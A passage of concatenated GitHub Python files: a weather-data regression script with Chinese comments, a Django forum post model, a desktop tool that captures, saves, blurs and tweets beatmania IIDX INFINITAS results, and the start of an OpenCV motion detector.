df_cesena = pd.read_csv('WeatherData/cesena_270615.csv')
df_faenza = pd.read_csv('WeatherData/faenza_270615.csv')
# dist 是一个装城市距离海边距离的列表
dist = [df_ravenna['dist'][0],
df_cesena['dist'][0],
df_faenza['dist'][0],
df_ferrara['dist'][0],
df_bologna['dist'][0],
df_mantova['dist'][0],
df_piacenza['dist'][0],
df_milano['dist'][0],
df_asti['dist'][0],
df_torino['dist'][0]
]
# temp_max 是一个存放每个城市最高温度的列表
temp_max = [df_ravenna['temp'].max(),
df_cesena['temp'].max(),
df_faenza['temp'].max(),
df_ferrara['temp'].max(),
df_bologna['temp'].max(),
df_mantova['temp'].max(),
df_piacenza['temp'].max(),
df_milano['temp'].max(),
df_asti['temp'].max(),
df_torino['temp'].max()
]
# temp_min 是一个存放每个城市最低温度的列表
temp_min = [df_ravenna['temp'].min(),
df_cesena['temp'].min(),
df_faenza['temp'].min(),
df_ferrara['temp'].min(),
df_bologna['temp'].min(),
df_mantova['temp'].min(),
df_piacenza['temp'].min(),
df_milano['temp'].min(),
df_asti['temp'].min(),
df_torino['temp'].min()
]
# 调用 subplots() 函数,重新定义 fig, ax 变量
fig, ax = plt.subplots()
plt.xticks(rotation=70)
hours = mdates.DateFormatter('%H:%M')
ax.xaxis.set_major_formatter(hours)
# 先把最高温画出来。
fig, ax = plt.subplots()
ax.plot(dist,temp_max,'ro')
# 用线性回归算法得到两条直线,分别表示两种不同的气温趋势,这样做很有趣。我们可以使用scikit-learn库的SVR方法。
from sklearn.svm import SVR
# dist1是靠近海的城市集合,dist2是远离海洋的城市集合
dist1 = dist[0:5]
dist2 = dist[5:10]
# 改变列表的结构,dist1现在是5个列表的集合
# 之后我们会看到 numpy 中 reshape() 函数也有同样的作用
dist1 = [[x] for x in dist1]
dist2 = [[x] for x in dist2]
# temp_max1 是 dist1 中城市的对应最高温度
temp_max1 = temp_max[0:5]
# temp_max2 是 dist2 中城市的对应最高温度
temp_max2 = temp_max[5:10]
# 我们调用SVR函数,在参数中规定了使用线性的拟合函数
# 并且把 C 设为1000来尽量拟合数据(因为不需要精确预测不用担心过拟合)
svr_lin1 = SVR(kernel='linear', C=1e3)
svr_lin2 = SVR(kernel='linear', C=1e3)
# 加入数据,进行拟合(这一步可能会跑很久,大概10多分钟,休息一下:) )
svr_lin1.fit(dist1, temp_max1)
svr_lin2.fit(dist2, temp_max2)
# 关于 reshape 函数请看代码后面的详细讨论
xp1 = np.arange(10,100,10).reshape((9,1))
xp2 = np.arange(50,400,50).reshape((7,1))
yp1 = svr_lin1.predict(xp1)
yp2 = svr_lin2.predict(xp2)
# ax = fig.add_subplot(122)
# 限制了 x 轴的取值范围
ax.set_xlim(0,400)
# 画出图像
ax.plot(xp1, yp1, c='b', label='Strong sea effect')
ax.plot(xp2, yp2, c='g', label='Light sea effect')
print(svr_lin1.coef_) #斜率
print(svr_lin1.intercept_) # 截距
print(svr_lin2.coef_)
print(svr_lin2.intercept_)
# 你可能会考虑将这两条直线的交点作为受海洋影响和不受海洋影响的区域的分界点,或者至少是海洋影响较弱的分界点。
from scipy.optimize import fsolve
# 定义了第一条拟合直线
def line1(x):
a1 = svr_lin1.coef_[0][0]
b1 = svr_lin1.intercept_[0]
return a1*x + b1
# 定义了第二条拟合直线
def line2(x):
a2 = svr_lin2.coef_[0][0]
b2 = svr_lin2.intercept_[0]
return a2*x + b2
# 定义了找到两条直线的交点的 x 坐标的函数
def findIntersection(fun1,fun2,x0):
return fsolve(lambda x : fun1(x) - fun2(x),x0)
result = findIntersection(line1,line2,0.0)
print("[x,y] = [ %d , %d ]" % (result,line1(result)))
ax.plot(result, line1(result), 'ys')
fig.show()
| eternity-phoenix/Private | 气象数据分析/气象线性分析.py | 气象线性分析.py | py | 4,432 | python | zh | code | 0 | github-code | 36 |
6790838721 | from django.db import models
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.fields import GenericRelation
from model_utils.models import TimeStampedModel
from files.mixins import UploadedFileMixin
from permissions.models import PermissionManagerMixin
from utils.models import CreatedByMixin
from utils.models.slug_field import AutoSlugCustomManagerField
from utils.descriptors import ChoicesDescriptorMixin
from ..managers.post import PostManager, AllPostManager
from ..conf import settings
from .mails.mails import PostEmailMixin
from .mixins import PostStatsMixin, PostPermissionsMixin, PostMetricMixin
class Post(
PostPermissionsMixin,
PostMetricMixin,
PostStatsMixin,
UploadedFileMixin,
PermissionManagerMixin,
CreatedByMixin,
ChoicesDescriptorMixin,
PostEmailMixin,
TimeStampedModel):
# Define here because of AutoSlugField
objects = PostManager()
all_objects = AllPostManager()
title = models.CharField(max_length=255)
description = models.TextField()
content_type = models.ForeignKey(
ContentType,
on_delete=models.CASCADE,
null=True,
)
object_id = models.PositiveIntegerField(null=True)
content_object = GenericForeignKey('content_type', 'object_id')
slug = AutoSlugCustomManagerField(
populate_from='title',
unique=True,
null=True,
blank=False,
)
tags = models.ManyToManyField('keywords.Keyword')
_type = models.CharField(
max_length=1,
choices=settings.FORUM_POST_CH_TYPE)
status = models.CharField(
max_length=1,
choices=settings.FORUM_CH_POST_STATUS,
default=settings.FORUM_CH_POST_STATUS_DEFAULT)
CHOICES_DESCRIPTOR_FIELDS = [
'_type',
'status',
]
CHOICES_DESCRIPTOR_FIELDS_CHOICES = [
settings.FORUM_POST_CH_TYPE,
settings.FORUM_CH_POST_STATUS,
]
logs = GenericRelation('PostAnswerStatus')
files = GenericRelation('files.UploadedFile')
objects = PostManager()
all_objects = AllPostManager()
slug_manager = AllPostManager()
class Meta:
verbose_name = 'Post'
verbose_name_plural = 'Posts'
ordering = ['-modified']
base_manager_name = 'objects'
permissions = settings.FORUM_PERMS_POST_ALL_PERMISSIONS
def __str__(self):
return self.title
@property
def category_name(self):
category_name = ''
if self.is_q_a_session:
category_name = '{} - {} - {}'.format(
self.get__type_display(),
self.content_object.team.project,
self.content_object.session.name,
)
elif self.content_object:
category_name = self.content_object.name
else:
category_name = self.get__type_display()
return category_name
@property
def circle(self):
if self.is_circle:
return self.content_object
return None
@property
def qa_session(self):
if self.is_q_a_session:
return self.content_object.session
return None
@property
def team(self):
if self.is_project:
return self.content_object
elif self.is_q_a_session:
return self.content_object.team
return None
@property
def project(self):
if self.team:
return self.team.project
return None
@property
def created_by_role(self):
return self.created_by.user_title
@property
def url(self):
if self.is_circle or self.is_project or self.is_announcement:
if self.is_circle:
circle = self.circle.slug
elif self.is_project:
circle = 'participant-questions'
else:
circle = 'announcements'
return settings.FRONTEND_POST_DETAIL_PAGE.format(
slug=self.slug,
circle=circle)
elif self.is_q_a_session:
return settings.FRONTEND_JOBS_SWARM_SESSION_QUESTION_PAGE.format(
**{
'pk_qa_session': self.content_object.session.pk,
'pk': self.pk
})
else:
return ''
@property
def url_project(self):
kwargs = {}
if self.project is not None:
kwargs = {
'project_id': self.project.pk,
'team_id': self.team.pk,
'pk': self.pk,
}
if self.is_project:
kwargs['section'] = 'ask-ecosystem'
elif self.is_q_a_session:
kwargs['section'] = 'swarm-session'
else:
kwargs = None
if kwargs is not None:
return settings.FRONTEND_PROJECT_QUESTION_PAGE.format(**kwargs)
return ''
def set_status(self, user_from, new_status):
self.logs.create(
user=user_from, status=self.status)
self.status = new_status
self.save(update_fields=['modified', 'status'])
def mark_as_removed(self, user_from):
self.can_update_or_remove(user_from)
self.set_status(user_from, settings.FORUM_CH_REMOVED)
self.action_removed(user_from)
def reply(self, user_from, comment, timestamp=None, **kwargs):
self.can_reply(user_from)
answer = self.answers.create(
comment=comment,
created_by=user_from,
reply_to=kwargs.get('reply_to'),
)
kwargs['target_object'] = answer
if timestamp:
self.answers.filter(pk=answer.pk).update(
created=timestamp,
modified=timestamp)
Post.objects.filter(pk=self.pk).update(modified=timestamp)
else:
self.save(update_fields=['modified'])
if kwargs.get('email_notification', True):
self.send_email_reply(answer)
answer.see(user_from)
super().reply(user_from, comment, timestamp, **kwargs)
return answer
| tomasgarzon/exo-services | service-exo-core/forum/models/post.py | post.py | py | 6,189 | python | en | code | 0 | github-code | 36 |
23563814386 | import keyboard
import time
import PySimpleGUI as sg
from threading import Thread,Event
from queue import Queue
from os.path import join,exists,pardir
import webbrowser
import logging
from urllib import request
from urllib.parse import quote
from setting import Setting
setting = Setting()
if setting.manage:
logging_level = logging.DEBUG
else:
logging_level = logging.WARNING
logging.basicConfig(
level=logging_level,
filename='log.txt',
filemode='w',
format='%(asctime)s - %(name)s %(levelname)-7s %(message)s'
)
logger = logging.getLogger()
logger.debug('loaded main.py')
logger.debug('mode: manage')
from version import version
import gui.main as gui
from gui.setting import open_setting
from gui.export import open_export
from gui.general import get_imagevalue
from define import define
from resources import resource,play_sound_result,check_latest
from screenshot import Screenshot,open_screenimage
from recog import recog
from raw_image import save_raw
from storage import StorageAccessor
from record import NotebookRecent,NotebookMusic,rename_allfiles
from graph import create_graphimage,save_graphimage
from result import result_save,result_savefiltered,get_resultimage,get_filteredimage
from filter import filter as filter_result
from playdata import Recent
from windows import find_window,get_rect,openfolder_results,openfolder_filtereds,openfolder_graphs
recent_maxcount = 100
thread_time_wait_nonactive = 1
thread_time_wait_loading = 30
thread_time_normal = 0.3
thread_time_result = 0.12
upload_confirm_message = [
'曲名の誤認識を通報しますか?',
'リザルトから曲名を切り取った画像をクラウドにアップロードします。'
]
windowtitle = 'beatmania IIDX INFINITAS'
exename = 'bm2dx.exe'
latest_url = 'https://github.com/kaktuswald/inf-notebook/releases/latest'
tweet_url = 'https://twitter.com/intent/tweet'
tweet_template_music = '&&music&&[&&play_mode&&&&D&&]&&update&&&&option&&'
tweet_template_hashtag = '#IIDX #infinitas573 #infnotebook'
class ThreadMain(Thread):
handle = 0
active = False
waiting = False
confirmed_result = False
confirmed_savable = False
processed_result = False
screen_latest = None
def __init__(self, event_close, queues):
self.event_close = event_close
self.queues = queues
Thread.__init__(self)
self.start()
def run(self):
self.sleep_time = thread_time_wait_nonactive
self.queues['log'].put('start thread')
while not self.event_close.wait(timeout=self.sleep_time):
self.routine()
def routine(self):
if self.handle == 0:
self.handle = find_window(windowtitle, exename)
if self.handle == 0:
return
self.queues['log'].put(f'infinitas find')
self.active = False
screenshot.xy = None
rect = get_rect(self.handle)
width = rect.right - rect.left
height = rect.bottom - rect.top
if rect is None or not width or not height:
self.queues['log'].put(f'infinitas lost')
self.sleep_time = thread_time_wait_nonactive
self.handle = 0
self.active = False
screenshot.xy = None
return
if width != define.width or height != define.height:
if self.active:
self.queues['log'].put(f'infinitas deactivate')
self.sleep_time = thread_time_wait_nonactive
self.active = False
screenshot.xy = None
return
if not self.active:
self.active = True
self.waiting = False
self.queues['log'].put(f'infinitas activate')
self.sleep_time = thread_time_normal
screenshot.xy = (rect.left, rect.top)
screen = screenshot.get_screen()
if screen != self.screen_latest:
self.screen_latest = screen
if screen == 'loading':
if not self.waiting:
self.confirmed_result = False
self.confirmed_savable = False
self.processed_result = False
self.waiting = True
self.queues['log'].put('find loading: start waiting')
self.sleep_time = thread_time_wait_loading
return
if self.waiting:
self.waiting = False
self.queues['log'].put('lost loading: end waiting')
self.sleep_time = thread_time_normal
shotted = False
if display_screenshot_enable:
screenshot.shot()
shotted = True
self.queues['display_image'].put(screenshot.get_image())
if screen != 'result':
self.confirmed_result = False
self.confirmed_savable = False
self.processed_result = False
return
if not self.confirmed_result:
self.confirmed_result = True
self.sleep_time = thread_time_result
if self.processed_result:
return
if not shotted:
screenshot.shot()
if not recog.get_is_savable(screenshot.np_value):
return
if not self.confirmed_savable:
self.confirmed_savable = True
self.find_time = time.time()
return
if time.time() - self.find_time <= thread_time_normal*2-0.1:
return
resultscreen = screenshot.get_resultscreen()
self.processed = True
self.queues['result_screen'].put(resultscreen)
self.sleep_time = thread_time_normal
self.processed_result = True
class Selection():
def __init__(self, play_mode, difficulty, music, notebook):
self.play_mode = play_mode
self.difficulty = difficulty
self.music = music
self.notebook = notebook
self.recent = False
self.filtered = False
self.graph = False
self.timestamp = None
def selection_recent(self, timestamp):
self.recent = True
self.filtered = False
self.graph = False
self.timestamp = timestamp
def selection_graph(self):
if self.music is None:
return False
self.recent = False
self.filtered = False
self.graph = True
self.timestamp = None
return True
def selection_timestamp(self, timestamp):
self.recent = False
self.filtered = False
self.graph = False
self.timestamp = timestamp
def selection_filtered(self):
self.filtered = True
self.graph = False
def get_targetrecordlist(self):
return self.notebook.get_recordlist(self.play_mode, self.difficulty)
def result_process(screen):
"""リザルトを記録するときの処理をする
Args:
screen (Screen): screen.py
"""
result = recog.get_result(screen)
if result is None:
return
resultimage = screen.original
if setting.data_collection or window['force_upload'].get():
if storage.upload_collection(result, resultimage, window['force_upload'].get()):
timestamps_uploaded.append(result.timestamp)
if setting.newrecord_only and not result.has_new_record():
return
if setting.play_sound:
play_sound_result()
images_result[result.timestamp] = resultimage
saved = False
if setting.autosave:
save_result(result, resultimage)
saved = True
filtered = False
if setting.autosave_filtered:
save_filtered(
resultimage,
result.timestamp,
result.informations.music,
result.play_side,
result.rival,
result.details.graphtarget == 'rival'
)
filtered = True
notebook_recent.append(result, saved, filtered)
notebook_recent.save()
music = result.informations.music
if music is not None:
if music in notebooks_music.keys():
notebook = notebooks_music[music]
else:
notebook = NotebookMusic(music) if music is not None else None
notebooks_music[music] = notebook
if not result.dead or result.has_new_record():
notebook.insert(result)
notebook.save()
if not result.dead or result.has_new_record():
recent.insert(result)
insert_results(result)
def save_result(result, image):
if result.timestamp in timestamps_saved:
return
ret = None
try:
music = result.informations.music
ret = result_save(image, music, result.timestamp, setting.imagesave_path, setting.savefilemusicname_right)
except Exception as ex:
logger.exception(ex)
gui.error_message(u'保存の失敗', u'リザルトの保存に失敗しました。', ex)
return
if ret:
timestamps_saved.append(result.timestamp)
log_debug(f'save result: {ret}')
def save_filtered(resultimage, timestamp, music, play_side, loveletter, rivalname):
"""リザルト画像にぼかしを入れて保存する
Args:
image (Image): 対象の画像(PIL)
timestamp (str): リザルトのタイムスタンプ
music (str): 曲名
play_side (str): 1P or 2P
loveletter (bool): ライバル挑戦状の有無
rivalname (bool): グラフターゲットのライバル名の有無
Returns:
Image: ぼかしを入れた画像
"""
filteredimage = filter_result(resultimage, play_side, loveletter, rivalname)
ret = None
try:
ret = result_savefiltered(filteredimage, music, timestamp, setting.imagesave_path, setting.savefilemusicname_right)
except Exception as ex:
logger.exception(ex)
gui.error_message(u'保存の失敗', u'リザルトの保存に失敗しました。', ex)
return
if ret:
images_filtered[timestamp] = filteredimage
log_debug(f'save filtered result: {ret}')
def insert_recentnotebook_results():
for timestamp in notebook_recent.timestamps:
target = notebook_recent.get_result(timestamp)
playmode = target['play_mode']
difficulty = target['difficulty']
list_results.insert(0, [
'☑' if target['saved'] else '',
'☑' if target['filtered'] else '',
timestamp,
target['music'] if target['music'] is not None else '??????',
f'{playmode}{difficulty[0]}' if playmode is not None and difficulty is not None else '???',
'☑' if target['clear_type_new'] else '',
'☑' if target['dj_level_new'] else '',
'☑' if target['score_new'] else '',
'☑' if target['miss_count_new'] else ''
])
refresh_table()
def insert_results(result):
global table_selected_rows
results_today[result.timestamp] = result
play_mode = result.informations.play_mode
difficulty = result.informations.difficulty
music = result.informations.music
list_results.insert(0, [
'☑' if result.timestamp in timestamps_saved else '',
'☑' if result.timestamp in images_filtered.keys() else '',
result.timestamp,
music if music is not None else '??????',
f'{play_mode}{difficulty[0]}' if play_mode is not None and difficulty is not None else '???',
'☑' if result.details.clear_type.new else '',
'☑' if result.details.dj_level.new else '',
'☑' if result.details.score.new else '',
'☑' if result.details.miss_count.new else ''
])
while len(list_results) > recent_maxcount:
del list_results[-1]
table_selected_rows = [v + 1 for v in table_selected_rows]
refresh_table(setting.display_result)
def update_resultflag(row_index, saved=False, filtered=False):
if saved:
list_results[row_index][0] = '☑'
if filtered:
list_results[row_index][1] = '☑'
def refresh_table(select_newest=False):
if select_newest:
window['table_results'].update(values=list_results, select_rows=[0])
else:
window['table_results'].update(values=list_results, select_rows=table_selected_rows)
def clear_tableselection():
table_selected_rows = []
window['table_results'].update(select_rows=table_selected_rows)
def active_screenshot():
if not screenshot.shot():
return
image = screenshot.get_image()
if image is not None:
filepath = save_raw(image)
log_debug(f'save screen: {filepath}')
gui.display_image(get_imagevalue(image))
window['screenshot_filepath'].update(join(pardir, filepath))
def log_debug(message):
logger.debug(message)
if setting.manage:
print(message)
def get_latest_version():
with request.urlopen(latest_url) as response:
url = response.geturl()
version = url.split('/')[-1]
print(f'released latest version: {version}')
if version[0] == 'v':
return version.removeprefix('v')
else:
return None
def check_resource():
informations_filename = f'{define.informations_resourcename}.res'
if check_latest(storage, informations_filename):
resource.load_resource_informations()
details_filename = f'{define.details_resourcename}.res'
if check_latest(storage, details_filename):
resource.load_resource_details()
musictable_filename = f'{define.musictable_resourcename}.res'
if check_latest(storage, musictable_filename):
resource.load_resource_musictable()
gui.update_musictable()
def select_result_recent():
if len(table_selected_rows) == 0:
return None
window['music_candidates'].update(set_to_index=[])
if len(table_selected_rows) != 1:
return None
timestamp = list_results[table_selected_rows[0]][2]
target = notebook_recent.get_result(timestamp)
if target['music'] is not None:
if target['music'] in notebooks_music.keys():
notebook = notebooks_music[target['music']]
else:
notebook = NotebookMusic(target['music'])
notebooks_music[target['music']] = notebook
else:
notebook = None
ret = Selection(
target['play_mode'],
target['difficulty'],
target['music'],
notebook
)
ret.selection_recent(timestamp)
if timestamp in results_today.keys():
display_today(ret)
else:
display_history(ret)
if ret.notebook is not None:
if ret.play_mode == 'SP':
window['play_mode_sp'].update(True)
if ret.play_mode == 'DP':
window['play_mode_dp'].update(True)
window['difficulty'].update(ret.difficulty)
window['search_music'].update(target['music'])
targetrecordlist = ret.get_targetrecordlist()
gui.display_record(targetrecordlist)
gui.display_historyresult(targetrecordlist, timestamp)
else:
gui.display_record(None)
return ret
def select_music_search():
if len(values['music_candidates']) != 1:
return None
play_mode = None
if values['play_mode_sp']:
play_mode = 'SP'
if values['play_mode_dp']:
play_mode = 'DP'
if play_mode is None:
return None
difficulty = values['difficulty']
if difficulty == '':
return None
music = values['music_candidates'][0]
clear_tableselection()
if music in notebooks_music.keys():
notebook = notebooks_music[music]
else:
notebook = NotebookMusic(music)
notebooks_music[music] = notebook
targetrecordlist = notebook.get_recordlist(play_mode, difficulty)
if targetrecordlist is None:
gui.display_record(None)
gui.display_image(None)
return None
ret = Selection(play_mode, difficulty, music, notebook)
gui.display_record(targetrecordlist)
create_graph(ret, targetrecordlist)
return ret
def select_history():
if len(values['history']) != 1:
return
clear_tableselection()
timestamp = values['history'][0]
selection.selection_timestamp(timestamp)
gui.display_historyresult(selection.get_targetrecordlist(), timestamp)
if timestamp in results_today.keys():
display_today(selection)
else:
display_history(selection)
def load_resultimages(timestamp, music, recent=False):
image_result = get_resultimage(music, timestamp, setting.imagesave_path)
images_result[timestamp] = image_result
if image_result is not None:
timestamps_saved.append(timestamp)
image_filtered = get_filteredimage(music, timestamp, setting.imagesave_path)
if not recent or image_result is None or image_filtered is not None:
images_filtered[timestamp] = image_filtered
def display_today(selection):
if selection.timestamp in imagevalues_result.keys():
resultimage = imagevalues_result[selection.timestamp]
else:
resultimage = get_imagevalue(images_result[selection.timestamp])
imagevalues_result[selection.timestamp] = resultimage
gui.display_image(resultimage, result=True)
def display_history(selection):
if not selection.timestamp in images_result.keys():
load_resultimages(selection.timestamp, selection.music, selection.timestamp in notebook_recent.timestamps)
if selection.timestamp in imagevalues_result.keys():
imagevalue_result = imagevalues_result[selection.timestamp]
else:
imagevalue_result = get_imagevalue(images_result[selection.timestamp]) if selection.timestamp in images_result.keys() and images_result[selection.timestamp] is not None else None
imagevalues_result[selection.timestamp] = imagevalue_result
if imagevalue_result is not None:
gui.display_image(imagevalue_result, result=True)
else:
if selection.timestamp in imagevalues_filtered.keys():
imagevalue_filtered = imagevalues_filtered[selection.timestamp]
else:
imagevalue_filtered = get_imagevalue(images_filtered[selection.timestamp]) if selection.timestamp in images_filtered.keys() and images_filtered[selection.timestamp] is not None else None
imagevalues_filtered[selection.timestamp] = imagevalue_filtered
gui.display_image(imagevalue_filtered, result=True)
if imagevalue_filtered is not None:
selection.selection_filtered()
def save():
if selection.recent:
for row_index in table_selected_rows:
timestamp = list_results[row_index][2]
if timestamp in results_today.keys() and not timestamp in timestamps_saved:
save_result(results_today[timestamp], images_result[timestamp])
notebook_recent.get_result(timestamp)['saved'] = True
update_resultflag(row_index, saved=True)
notebook_recent.save()
refresh_table()
if selection.graph:
save_graphimage(selection.music, images_graph[selection.music], setting.imagesave_path, setting.savefilemusicname_right)
def filter():
"""ライバル欄にぼかしを入れて、ぼかし画像を表示する
最近のリザルトから選択している場合:
選択しているすべてのリザルトにぼかし処理を実行する。
ただし今日のリザルトでない場合は、リザルト画像がファイル保存されている場合のみ、処理が可能。
曲検索から選択している場合:
それが最近のリザルトに含まれている場合は、ぼかし処理ができない(tableのインデックスがわからないため)。
ぼかし画像の有無の確認のみ行い、画像がある場合はそれを表示する。
"""
if selection.recent:
updated = False
for row_index in table_selected_rows:
timestamp = list_results[row_index][2]
target = notebook_recent.get_result(timestamp)
if not timestamp in images_result.keys():
load_resultimages(timestamp, target['music'], True)
if images_result[timestamp] is not None and not timestamp in images_filtered.keys():
save_filtered(
images_result[timestamp],
timestamp,
target['music'],
target['play_side'],
target['has_loveletter'],
target['has_graphtargetname']
)
target['filtered'] = True
update_resultflag(row_index, filtered=True)
updated = True
if updated:
notebook_recent.save()
refresh_table()
else:
if not selection.timestamp in images_result.keys() and not selection.timestamp in notebook_recent.timestamps:
load_resultimages(selection.timestamp, selection.music)
if selection.timestamp in imagevalues_filtered.keys():
imagevalue = imagevalues_filtered[selection.timestamp]
else:
filteredimage = images_filtered[selection.timestamp] if selection.timestamp in images_filtered.keys() else None
imagevalue = get_imagevalue(filteredimage) if filteredimage is not None else None
if imagevalue is not None:
imagevalues_filtered[selection.timestamp] = imagevalue
if imagevalue is not None:
gui.display_image(imagevalue, result=True)
selection.selection_filtered()
def upload():
if not selection.recent:
return
if not gui.question('確認', upload_confirm_message):
return
for row_index in table_selected_rows:
timestamp = list_results[row_index][2]
if timestamp in results_today.keys() and not timestamp in timestamps_uploaded:
storage.upload_collection(results_today[timestamp], images_result[timestamp], True)
timestamps_uploaded.append(timestamp)
def open_folder_results():
ret = openfolder_results(setting.imagesave_path)
if ret is not None:
logger.exception(ret)
gui.error_message(u'失敗', u'フォルダを開くのに失敗しました。', ret)
def open_folder_filtereds():
ret = openfolder_filtereds(setting.imagesave_path)
if ret is not None:
logger.exception(ret)
gui.error_message(u'失敗', u'フォルダを開くのに失敗しました。', ret)
def open_folder_graphs():
ret = openfolder_graphs(setting.imagesave_path)
if ret is not None:
logger.exception(ret)
gui.error_message(u'失敗', u'フォルダを開くのに失敗しました。', ret)
def tweet():
if len(values['table_results']) > 0:
musics_text = []
for index in reversed(values['table_results']):
result = notebook_recent.get_result(list_results[index][2])
music = result['music']
music = music if music is not None else '??????'
text = tweet_template_music
text = text.replace('&&play_mode&&', result['play_mode'])
text = text.replace('&&D&&', result['difficulty'][0])
text = text.replace('&&music&&', music)
if result['update_clear_type'] is not None or result['update_dj_level'] is not None:
text = text.replace('&&update&&', ' '.join(v for v in [result['update_clear_type'], result['update_dj_level']] if v is not None))
else:
if result['update_score'] is not None:
text = text.replace('&&update&&', f"自己ベスト+{result['update_score']}")
else:
if result['update_miss_count'] is not None:
text = text.replace('&&update&&', f"ミスカウント{result['update_miss_count']}")
else:
text = text.replace('&&update&&', '')
if result['option'] is not None:
if result['option'] == '':
text = text.replace('&&option&&', '(正規)')
else:
text = text.replace('&&option&&', f"({result['option']})")
else:
text = text.replace('&&option&&', '')
musics_text.append(text)
music_text = '\n'.join(musics_text)
else:
if len(values['music_candidates']) == 1:
music_text = tweet_template_music
music_text = music_text.replace('&&play_mode&&', selection.play_mode)
if selection.music is not None:
music_text = music_text.replace('&&music&&', selection.music)
else:
music_text = music_text.replace('&&music&&', '?????')
music_text = music_text.replace('&&D&&', selection.difficulty[0])
music_text = music_text.replace('&&update&&', '')
music_text = music_text.replace('&&option&&', '')
else:
music_text = ''
text = quote('\n'.join((music_text, tweet_template_hashtag)))
url = f'{tweet_url}?text={text}'
webbrowser.open(url)
def delete_record():
if selection is None:
return
if selection.music in notebooks_music.keys():
del notebooks_music[selection.music]
selection.notebook.delete()
gui.search_music_candidates()
gui.display_record(None)
gui.display_image(None)
def delete_targetrecord():
if selection is None:
return
if selection.timestamp is None:
return
selection.notebook.delete_history(
selection.play_mode,
selection.difficulty,
selection.timestamp
)
gui.display_record(selection.get_targetrecordlist())
gui.display_image(None)
def create_graph(selection, targetrecord):
graphimage = create_graphimage(selection.play_mode, selection.difficulty, selection.music, targetrecord)
if graphimage is None:
return
images_graph[selection.music] = graphimage
imagevalue = get_imagevalue(graphimage)
gui.display_image(imagevalue, graph=True)
selection.selection_graph()
def rename_all_musicnotebooks():
if resource.informations is None:
return
rename_allfiles(resource.musictable['musics'].keys())
if __name__ == '__main__':
keyboard.add_hotkey('alt+F10', active_screenshot)
window = gui.generate_window(setting, version)
display_screenshot_enable = False
screenshot = Screenshot()
notebook_recent = NotebookRecent(recent_maxcount)
notebooks_music = {}
results_today = {}
timestamps_saved = []
timestamps_uploaded = []
images_result = {}
images_filtered = {}
imagevalues_result = {}
imagevalues_filtered = {}
images_graph = {}
selection = None
recent = Recent()
list_results = []
table_selected_rows = []
queue_log = Queue()
queue_display_image = Queue()
queue_result_screen = Queue()
storage = StorageAccessor()
event_close = Event()
thread = ThreadMain(
event_close,
queues = {
'log': queue_log,
'display_image': queue_display_image,
'result_screen': queue_result_screen
}
)
music_search_time = None
if not setting.has_key('data_collection'):
setting.data_collection = gui.collection_request('resources/annotation.png')
setting.save()
if setting.data_collection:
window['button_upload'].update(visible=True)
if version != '0.0.0.0' and get_latest_version() != version:
gui.find_latest_version(latest_url)
if not setting.ignore_download:
Thread(target=check_resource).start()
# version0.7.0.1以前の不具合対応のため
rename_all_musicnotebooks()
insert_recentnotebook_results()
while True:
event, values = window.read(timeout=50, timeout_key='timeout')
try:
if event in (sg.WIN_CLOSED, sg.WINDOW_CLOSE_ATTEMPTED_EVENT):
if not thread is None:
event_close.set()
thread.join()
log_debug(f'end')
break
if event == 'check_display_screenshot':
display_screenshot_enable = values['check_display_screenshot']
if event == 'check_display_result':
setting.display_result = values['check_display_result']
if event == 'check_newrecord_only':
setting.newrecord_only = values['check_newrecord_only']
if event == 'check_autosave':
setting.autosave = values['check_autosave']
if event == 'check_autosave_filtered':
setting.autosave_filtered = values['check_autosave_filtered']
if event == 'check_display_music':
setting.display_music = values['check_display_music']
gui.switch_table(setting.display_music)
if event == 'check_play_sound':
setting.play_sound = values['check_play_sound']
if event == 'check_savefilemusicname_right':
setting.savefilemusicname_right = values['check_savefilemusicname_right']
if event == 'text_file_path':
if exists(values['text_file_path']):
screen = open_screenimage(values['text_file_path'])
gui.display_image(get_imagevalue(screen.original))
if recog.get_is_savable(screen.np_value):
result_process(screen)
if event == 'button_setting':
open_setting(setting)
window['button_upload'].update(visible=setting.data_collection)
if event == 'button_save':
save()
if event == 'button_filter':
filter()
if event == 'button_open_folder_results':
open_folder_results()
if event == 'button_open_folder_filtereds':
open_folder_filtereds()
if event == 'button_open_folder_graphs':
open_folder_graphs()
if event == 'button_tweet':
tweet()
if event == 'button_export':
open_export(recent)
if event == 'button_upload':
upload()
if event == 'table_results':
if values['table_results'] != table_selected_rows:
table_selected_rows = values['table_results']
selection_result = select_result_recent()
if selection_result is not None:
selection = selection_result
if selection.music is not None:
window['music_candidates'].update([selection.music], set_to_index=[0])
else:
window['music_candidates'].update(set_to_index=[])
if event == 'button_graph':
if selection is not None and selection.music is not None:
create_graph(selection, selection.get_targetrecordlist())
if event == 'category_versions':
gui.search_music_candidates()
if event == 'search_music':
music_search_time = time.time() + 1
if event in ['play_mode_sp', 'play_mode_dp', 'difficulty', 'music_candidates']:
selection_result = select_music_search()
if selection_result is not None:
selection = selection_result
if event == '選択した曲の記録を削除する':
delete_record()
selection = None
if event == 'history':
select_history()
if event == '選択したリザルトの記録を削除する':
delete_targetrecord()
if event == 'button_best_switch':
gui.switch_best_display()
if event == 'timeout':
if not window['positioned'].visible and thread.handle:
window['positioned'].update(visible=True)
if window['positioned'].visible and not thread.handle:
window['positioned'].update(visible=False)
if not window['captureenable'].visible and screenshot.xy:
window['captureenable'].update(visible=True)
if window['captureenable'].visible and not screenshot.xy:
window['captureenable'].update(visible=False)
if music_search_time is not None and time.time() > music_search_time:
music_search_time = None
gui.search_music_candidates()
if not queue_log.empty():
log_debug(queue_log.get_nowait())
if not queue_display_image.empty():
clear_tableselection()
window['music_candidates'].update(set_to_index=[])
selection = None
gui.display_image(get_imagevalue(queue_display_image.get_nowait()))
if not queue_result_screen.empty():
result_process(queue_result_screen.get_nowait())
except Exception as ex:
log_debug(ex)
window.close()
del screenshot
| kaktuswald/inf-notebook | main.pyw | main.pyw | pyw | 34,382 | python | en | code | 4 | github-code | 36 |
1522352511 | import cv2, time, pandas
from datetime import datetime
firstFrame = None
statusList = [None, None]
times = []
contourCount = []
frameCount = []
avgContour = []
contCStart = 0 #indicator to start recording contour area
video = cv2.VideoCapture(0, cv2.CAP_DSHOW)
df = pandas.DataFrame(columns=["Start","End"])
while True:
check, frame = video.read()
status = 0
# turning gray
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (21,21), 0)
#catch first frame for later comparisons
if firstFrame is None:
firstFrame = gray
continue
delta = cv2.absdiff(firstFrame, gray)
#finding areas of movement and turning them to black/white
# then finding contours for the movement
threshFrame = cv2.threshold(delta, 30, 255, cv2.THRESH_BINARY)[1]
